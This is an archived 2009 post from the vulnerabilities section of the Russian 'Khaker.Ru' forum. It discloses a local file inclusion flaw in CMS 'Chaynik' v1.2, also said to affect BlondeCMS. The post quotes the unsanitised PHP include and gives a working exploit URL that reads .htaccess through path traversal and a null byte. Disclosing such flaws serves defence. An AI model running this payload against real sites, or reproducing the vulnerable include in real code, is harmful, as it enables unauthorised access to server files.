Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 
журналы новости статьи video форум подписка на «Хакер»

CMS Чайник ))

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> CMS Чайник ))
Имя
Сообщение << Старые топики   Новые топики >>
CMS Чайник )) - 2009-12-21 18:56:26.850000   
FriLL

Сообщений: 2539
Оценки: 335
Присоединился: 2007-08-11 17:14:26.703333
 CMS Чайник - http://www.cms-chaynik.ru/
v.1.2


LFI(index.php)

if (isset($_GET ['id'])) { $id = $_GET ['id']; } else { $id = $index; } if (file_exists ("content/" . $id . ".php")) { include ("content/" . $id . ".php"); }
Expl: http://localhost/cms/index.php?id=../.htaccess%00

Этой же уязвимости и подвержен BlondeCMS (http://blondecms.ru/)
Post #: 1
Страниц:  [1]
Все форумы >> [Уязвимости] >> CMS Чайник ))







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.